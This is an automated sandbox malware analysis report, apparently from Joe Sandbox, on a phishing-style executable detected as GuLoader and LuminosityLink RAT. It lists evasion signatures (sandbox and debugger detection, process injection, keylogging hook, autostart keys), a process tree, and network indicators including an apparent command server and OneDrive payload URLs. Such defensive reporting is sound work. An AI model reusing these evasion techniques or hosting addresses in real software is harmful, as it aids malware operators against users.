Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New Inquiry 903838737777721102029393003938.exe

Overview

General Information

Sample Name:New Inquiry 903838737777721102029393003938.exe
Analysis ID:112557
MD5:01a54f73856cfb74a3bbba47bcec227b
SHA1:ed2ed885dcd7be832cdae5c189bd7db78ca9eaa2
SHA256:759c87f02d5850ee317454dc8242067d042a320f653946c9162b645c0ae68ba6

Most interesting Screenshot:

Detection

GuLoader LuminosityLink
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected GuLoader
Yara detected LuminosityLink RAT
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Installs a global keyboard hook
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64native
  • New Inquiry 903838737777721102029393003938.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
    • RegAsm.exe (PID: 1576 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
    • RegAsm.exe (PID: 1440 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
      • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
      • anibtcent.exe.exe (PID: 4188 cmdline: 'C:\ProgramData\782401\anibtcent.exe.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
        • conhost.exe (PID: 1500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • demisphereklediskene.exe (PID: 1812 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
    • RegAsm.exe (PID: 4328 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
      • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • RegAsm.exe (PID: 2652 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • demisphereklediskene.exe (PID: 2140 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmpJoeSecurity_LuminosityLinkYara detected LuminosityLink RATJoe Security
      00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 1440JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          Process Memory Space: RegAsm.exe PID: 1440JoeSecurity_LuminosityLinkYara detected LuminosityLink RATJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeVirustotal: Detection: 20%Perma Link
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeReversingLabs: Detection: 18%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New Inquiry 903838737777721102029393003938.exeVirustotal: Detection: 20%Perma Link
            Source: New Inquiry 903838737777721102029393003938.exeReversingLabs: Detection: 18%
            Yara detected LuminosityLink RATShow sources
            Source: Yara matchFile source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            Bitcoin Miner:

            barindex
            Yara detected LuminosityLink RATShow sources
            Source: Yara matchFile source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY
            Source: global trafficTCP traffic: 192.168.0.80:49780 -> 194.5.97.46:3021
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: RegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmpString found in binary or memory: https://aka.ms/hcsadmin
            Source: RegAsm.exe, 0000000D.00000002.24301095324.000000000107D000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmpString found in binary or memory: https://eaup2w.sn.files.1drv.com/
            Source: RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmpString found in binary or memory: https://eaup2w.sn.files.1drv.com/y4m4bqAkwHQUJx1iHbF6prKSSCddXNt-56Mg951zMrckoiAx-x88t2pks0UEJqWB7st
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmpString found in binary or memory: https://eaup2w.sn.files.1drv.com/y4mcRoU26afjmMcM96C_CG1xmFAJaGVWXqZWLE8oSmKi-bsn2pOmBTUtvaCnggDIr1k
            Source: RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=249E8FCE0A15C968&resid=249E8FCE0A15C968%211276&authkey=ADoYXV
            Source: RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/l
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeJump to behavior

            E-Banking Fraud:

            barindex
            Yara detected LuminosityLink RATShow sources
            Source: Yara matchFile source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_02240A3F NtSetInformationThread,3_2_02240A3F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_02240AA2 NtSetInformationThread,3_2_02240AA2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F09EF3 NtSetInformationThread,13_2_00F09EF3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F005E5 EnumWindows,NtSetInformationThread,13_2_00F005E5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F09B4C NtProtectVirtualMemory,13_2_00F09B4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F016BE NtSetInformationThread,13_2_00F016BE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F00A7A NtSetInformationThread,13_2_00F00A7A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F09E56 NtProtectVirtualMemory,13_2_00F09E56
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F00631 NtSetInformationThread,13_2_00F00631
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F00629 NtSetInformationThread,13_2_00F00629
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F011F0 NtSetInformationThread,13_2_00F011F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F01719 NtSetInformationThread,13_2_00F01719
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_204F2CD2 NtQuerySystemInformation,13_2_204F2CD2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_204F2C97 NtQuerySystemInformation,13_2_204F2C97
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeCode function: 18_2_021C0A3F NtSetInformationThread,18_2_021C0A3F
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeCode function: 18_2_021C0AA2 NtSetInformationThread,18_2_021C0AA2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C39EF3 NtSetInformationThread,19_2_00C39EF3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C305E5 EnumWindows,NtSetInformationThread,19_2_00C305E5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C39B4C NtProtectVirtualMemory,19_2_00C39B4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C316BE NtSetInformationThread,19_2_00C316BE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C39E56 NtProtectVirtualMemory,19_2_00C39E56
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C30A7A NtSetInformationThread,19_2_00C30A7A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C3A824 NtQueryInformationProcess,19_2_00C3A824
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C30629 NtSetInformationThread,19_2_00C30629
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C30631 NtSetInformationThread,19_2_00C30631
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C311F0 NtSetInformationThread,19_2_00C311F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C3A30D NtQueryInformationProcess,19_2_00C3A30D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C39F12 NtQueryInformationProcess,19_2_00C39F12
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C31719 NtSetInformationThread,19_2_00C31719
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Windows\SysWOW64\clientsvr.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F005E513_2_00F005E5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE1E1E13_2_1FEE1E1E
            Source: C:\ProgramData\782401\anibtcent.exe.exeCode function: 16_2_050F01B716_2_050F01B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C305E519_2_00C305E5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 21_2_00C801B721_2_00C801B7
            Source: New Inquiry 903838737777721102029393003938.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: demisphereklediskene.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStrenger.exe vs New Inquiry 903838737777721102029393003938.exe
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037858669.00000000005E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs New Inquiry 903838737777721102029393003938.exe
            Source: New Inquiry 903838737777721102029393003938.exeBinary or memory string: OriginalFilenameStrenger.exe vs New Inquiry 903838737777721102029393003938.exe
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeSection loaded: vb6zz.dllJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@16/8@10/2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_204F2A92 AdjustTokenPrivileges,13_2_204F2A92
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_204F2A5B AdjustTokenPrivileges,13_2_204F2A5B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\Hustankesgy3Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:120:WilError_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\7433cdb324b04dd5e3c3db213381216c7c539baa
            Source: New Inquiry 903838737777721102029393003938.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dllJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: New Inquiry 903838737777721102029393003938.exeVirustotal: Detection: 20%
            Source: New Inquiry 903838737777721102029393003938.exeReversingLabs: Detection: 18%
            Source: unknownProcess created: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Hustankesgy3\demisphereklediskene.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\Hustankesgy3\demisphereklediskene.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' Jump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe' Jump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9554_none_d08d6fa2442aa556\MSVCR80.dllJump to behavior
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000D.00000002.24325004854.000000001FFF5000.00000004.00000001.sdmp, anibtcent.exe.exe, anibtcent.exe.exe.13.dr
            Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000000D.00000002.24324313659.000000001FF60000.00000002.00000001.sdmp, RegAsm.exe, 00000013.00000002.24283755110.000000001FDF0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORY
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040E750 pushad ; ret 3_2_0040E7DF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00406A5A push ecx; retf 3_2_00406A5B
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040E77E pushad ; ret 3_2_0040E7DF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00406418 push ecx; retf 3_2_0040642F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409FC6 push ecx; ret 3_2_00409FC7
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A6C9 push ebx; retf 3_2_0040A6D3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409FE7 push ebx; retf 3_2_00409FF3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A6EC push ebx; retf 3_2_0040A703
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409F88 push ebx; retf 3_2_00409F8F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A68E push ebx; retf 3_2_0040A703
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409FAC push ebx; retf 3_2_00409FBF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A0B0 push ecx; ret 3_2_0040A0C3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_004063B8 push ecx; retf 3_2_0040642F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409EBE push ebp; retf 3_2_00409EF3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_02240A3F push cs; retf 3_2_02240A91
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_02243604 push edi; ret 3_2_0224360E
